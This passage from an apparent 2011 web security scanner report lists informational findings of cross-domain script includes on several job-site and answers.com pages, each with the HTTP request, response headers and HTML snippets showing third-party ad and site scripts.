...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.9. http://www.aharrisonbarnes.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:47 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=4quu0rekl19krf2nje0ll9eoh4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648507; expires=Sat, 21-Jan-2012 22:21:47 GMT; path=/
Set-Cookie: wishlist_reg_cookie=a%3A2%3A%7Bi%3A0%3Bs%3A32%3A%223c3c6b959b0eb6c9f284b26fe4e19553%22%3Bi%3A1%3Bi%3A1295648508%3B%7D; path=/
Set-Cookie: wishlist_reg_cookie_manual=1; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91358

<script>
function ValidatorTrim_video(s)
{
var m = s.match(/^\s*(\S+(\s+\S+)*)\s*$/);
return (m == null) ? "" : m[1];
}

function checkEmail_video(strng)
{
   var error = "";
   if (strng == "")

...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.10. http://www.aharrisonbarnes.com/contact-us/script/functions.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /contact-us/script/functions.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /contact-us/script/functions.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.aharrisonbarnes.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 22 Jan 2011 00:17:06 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=a0f1qvin1rmg1u6sbvil1pk2c0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Last-Modified: Sat, 22 Jan 2011 00:17:07 GMT
Set-Cookie: wpgb_visit_last_php-default=1295655427; expires=Sun, 22-Jan-2012 00:17:07 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 93480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.11. http://www.aharrisonbarnes.com/do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /do-not-stop-seeing-opportunity-step-outside-your-minds-comfort-zone-and-begin-to-dream/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:36 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=td5el2h9micq2p5p4knldobtl7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648498; expires=Sat, 21-Jan-2012 22:21:38 GMT; path=/
Link: <http://www.aharrisonbarnes.com/?p=1189>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 185016


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.12. http://www.aharrisonbarnes.com/hb-course/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /hb-course/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /hb-course/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:49 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=8o9prlskfceq1un5hq35vcpgi6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648510; expires=Sat, 21-Jan-2012 22:21:50 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41521

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.13. http://www.aharrisonbarnes.com/push-yourself-outside-your-comfort-zone/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /push-yourself-outside-your-comfort-zone/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /push-yourself-outside-your-comfort-zone/ HTTP/1.1
Host: www.aharrisonbarnes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:38 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=5o76npmpltlll2h6khib1qgu27; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Set-Cookie: wpgb_visit_last_php-default=1295648499; expires=Sat, 21-Jan-2012 22:21:39 GMT; path=/
Link: <http://www.aharrisonbarnes.com/?p=14138>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 141561


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.14. http://www.aharrisonbarnes.com/wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/plugins/drop-caps/'dropcaps-no-ie.css'%20screen HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.aharrisonbarnes.com

Response

HTTP/1.1 404 Not Found
Date: Sat, 22 Jan 2011 00:14:21 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=dtob70g4f8pltdn39q5stffbl1; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.aharrisonbarnes.com/xmlrpc.php
Last-Modified: Sat, 22 Jan 2011 00:14:23 GMT
Set-Cookie: wpgb_visit_last_php-default=1295655263; expires=Sun, 22-Jan-2012 00:14:23 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 100571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="h
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...

15.15. http://www.aharrisonbarnes.com/wp-content/themes/HB_new_theme/javascript/ad.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aharrisonbarnes.com
Path:   /wp-content/themes/HB_new_theme/javascript/ad.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/themes/HB_new_theme/javascript/ad.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.aharrisonbarnes.com

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 00:15:26 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Sat, 03 Jul 2010 13:10:45 GMT
ETag: "c10c73-5e1-48a7b6e6b9f40"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/x-javascript
Content-Length: 1505

function displayad()
{
   <script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
var m3_u = (location.protocol=='https:'?'https://srvr12.pdcsrvr.com/media/www/
...[SNIP]...

15.16. http://www.answers.com/topic/vinson-elkins-llp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.answers.com
Path:   /topic/vinson-elkins-llp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /topic/vinson-elkins-llp HTTP/1.1
Host: www.answers.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:39:52 GMT
Server: AWS
Set-Cookie: lc=nt013; path=/; domain=www.answers.com; expires=Fri, 04-Feb-2011 18:39:52 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=05EA67FCD231E20FB8B1E7B8BD5DBA11; Path=/
Set-Cookie: settings=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Expires=Sat, 21-Jan-2012 18:39:52 GMT; Path=/
Set-Cookie: settingsS=ver||fayt|1|ate|1|tabOrder|default|home|1; Domain=.answers.com; Path=/
Set-Cookie: afid=0; Expires=Sun, 13-Jan-2041 18:39:52 GMT; Path=/
Set-Cookie: GNFirstVisit=1295635192020; Expires=Sun, 13-Jan-2041 18:39:52 GMT; Path=/
Set-Cookie: tacodaSession=; Path=/
Set-Cookie: nafid=0; Path=/
Set-Cookie: referrerDomainSession=none; Path=/
Set-Cookie: firstPageTypeSession=topic-page; Path=/
Vary: Accept-Encoding
Connection: close
Content-Length: 69874

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html class="IE IEnew IE7" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.
...[SNIP]...
<link rel="shortcut icon" href="http://www.answers.com/favicon.ico">
<script charset="utf-8" type="text/javascript" src="http://en.site2.answcdn.com/templates/scripts/~XbOSxt.js?v=78757"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://site.answcdn.com/main77409/js-utils/answ_utils1337975.js"></script>
...[SNIP]...
</script>

<script language="JavaScript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

15.17. http://www.architecturecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.architecturecrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.architecturecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:21:50 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u8cdprgtig27p3jst5fgnvcol0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:21:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:21:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 125304

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
